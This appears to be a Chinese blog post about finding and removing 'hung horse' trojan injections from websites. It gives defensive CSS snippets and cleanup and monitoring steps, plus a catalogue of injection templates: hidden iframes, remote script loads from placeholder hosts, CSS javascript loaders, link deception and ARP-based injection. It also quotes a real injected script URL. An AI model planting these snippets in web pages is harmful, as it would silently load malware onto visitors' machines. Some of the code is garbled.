如果網站被掛馬,又找不到被掛馬的網頁嗎可以在網頁中插入以下代碼
<script>
iframe{n1ifm:expression(this.src='about:blank',this.outerHTML='');}/*這行代碼是解決掛IFRAME木馬的哦*/
script{nojs1:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('木馬被成功隔離!'):'');}</script>
原理:將<script>標記的src拿出來轉為小寫,再看是不是以“http”開頭的外域JS腳本文件,如果是,則頁面內容清空并寫出“木馬被成功隔離!”。反之正常顯示。
缺點:訪客無法看到被感染了<script>木馬的頁面。
解決方案2:
<script>
iframe{nifm2:expression(this.src='about:blank',this.outerHTML='');}
script{no2js:expression((this.src.toLowerCase().indexOf('http')==0)?document.close():'');}
<script>
原理:將外域的JS文件的document.write()使用document.close()強制關閉。木馬內容還沒有來得及寫完,只有部分被強制緩存輸出了,剩下的不會再寫了。
這幾天,vich在寫一個程序,意外中發現vich的排名下降了很多,流量也很少!分析了下HTML代碼,在</html>后多了一句“<script src=http://ntrjj.cn></script>”的代碼!一直是以為用的是免費空間的原因,在咨詢空間的負責人后發現并不是那樣 -_-! 網站被掛馬了,今天從ftp里找到了所有的“<script src=http://ntrjj.cn></script>”,并刪除掉,可原因并沒有找到,在這里vich搜集了點兒幾種清除網頁木馬的方法,希望能幫助有如同我一樣遭遇的網友-----
一、首先要確認是什么網頁木馬,可以從殺毒軟件中獲得信息,通過他的癥狀判斷是哪一種類型的木馬。
二、通常網頁木馬的代碼都是是這樣的,我提供一些資料希望對大家有幫助,以便查看網馬的代碼是哪段
1:框架掛馬
<iframe src=地址 width=0 height=0></iframe>
2:js文件掛馬
首先將以下代碼
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存為xxx.js,
則JS掛馬代碼為
<script language=javascript src=xxx.js></script>
3:js變形加密
<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后綴
4:body掛馬
<body onload="window.location='地址';"></body>
5:隱蔽掛馬
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n
<iframe http://www.xxx.com/muma.htm/">'">http://www.xxx.com/muma.htm/"></iframe>';
6:css中掛馬
body {
background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')}
7:JAJA掛馬
<SCRIPT language=javascript>
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,
menubar=no,scro llbars=no,width=1,height=1");
</script>
8:圖片偽裝
<html>
<iframe src="網馬地址" height=0 width=0></iframe>
<img src="圖片地址"></center>
</html>
9:偽裝調用:
<frameset rows="444,0" cols="*">
<frame src="打開網頁" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="網馬地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>
10:高級欺騙
<a href=http://www.163.com(迷惑連接地址,顯示這個地址指向木馬地址)
onMouseOver="www_163_com(); return true;"> 頁面要顯示的內容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="網馬地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,
menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>
11: 超級網馬—通過arp欺騙來直接掛馬
原理:arp中間人攻擊,實際上相當于做了一次代理。
正常時候: A---->B ,A是訪問的正常客戶,B是要攻擊的服務器,C是被我們控制的主機
arp中間人攻擊時候: A---->C---->B
B---->C---->A
實際上,C在這里做了一次代理的作用
那么HTTP請求發過來的時候,C判斷下是哪個客戶端發過來的包,轉發給B,然后B返回HTTP響應的時候,在HTTP響應包中,插入一段掛馬的代碼,比如 <iframe>...之類,再將修改過的包返回的正常的客戶A,就起到了一個掛馬的作用.在這個過程中,B是沒有任何感覺的,直接攻擊的是正常的客戶A,如果A是管理員或者是目標單位,就直接掛上馬了。)
以上是比較歷害的網頁木馬代碼
三、 種了木馬如何處理呢?
1、找到嵌入的網頁木馬文件。以下,拿自己的經歷說事。找到的文件是wm.htm
2、在注冊表中查找wm.htm。很幸運,找到了。開始順藤摸瓜...
3、修改鍵值wm.htm為wm_nnd.htm。
4、再次查找wm.htm。很不幸,又查到了。說明有服務程序在作怪。嘿嘿,有意外發現。cain.exe,據說是密碼嗅探器。
5、修改鍵值cain.exe為cain_nnd.exe。
6、查找cain.exe,仍然可以查到。嘻嘻,在預料之中。
7、懷疑wm.htm與cain.exe同流合污,背后有服務程序作后臺。
8、快查查看,系統服務程序。在運行->msconfig 或直接在命令行使用net start,查看可疑程序
9、發現temp*.exe(全名記不清了),立馬net stop server 。
10、快去修改鍵值wm.htm為wm_nnd.htm,cain.exe為cain_nnd.exe。
11、再次查找wm.htm或cain.exe,沒有找到。哈哈,很好。
12、觀察了幾天,沒再發生掛馬的現象。
四、通過檢測網絡連接查看服務器是否中了木馬或病毒
1、使用netstat -an 查看所有和本地計算機建立連接的IP。
2、連接包含四個部分——proto(連接方式)、local address(本地連接地址)、foreign address(和本地建立連接的地址)、state(當前端口狀態)。 通過這個命令的詳細信息,可以完全監控計算機上的連接,從而達到控制計算機的目的。
3、手工制作bat程序,生成網絡連接日志文件供站長分析:bat文件代碼如下
REM 注釋:監控的時間
time /t>>Netstat.log
REM 每隔30秒,把服務器上通過tcp協議通訊的IP和端口寫入日志文件
Netstat -n -p tcp 30>>Netstat.log
注意:要謹慎使用,這會給服務器帶來性能影響。最好,在服務器發生異常,懷疑中木馬或病毒時,用來分析網絡連接日志。
僅僅這些還不夠,說說更嚴重的:
1、可惡的攻擊者喜歡使用克隆賬號的方法來控制你的計算機。“它們”激活一個系統中的默認賬戶,但這個賬戶是不經常用的, 然后使用工具把這個賬戶提升到管理員權限,從表面上看來這個賬戶還是和原來一樣,但是這個克隆的賬戶卻是系統中最大的安全隱患。
2、趕快檢測系統帳戶:
a、在命令行下輸入net user,查看計算機上有些什么用戶。
b、使用“net user 用戶名”查看這個用戶屬于什么權限的及登錄時間等。
c、一般除了Administrator是administrators組的,如果你發現一個系統內置的用戶是屬于administrators組的,那么別人在你的計算機上克隆賬戶的概率為90%。
d、是使用“net user 用戶名 /del” 來刪掉這個用戶,還是修改其它配置,這你說了算。
posted on 2010-06-05 12:25
sanmao 閱讀(124)
評論(0) 編輯 收藏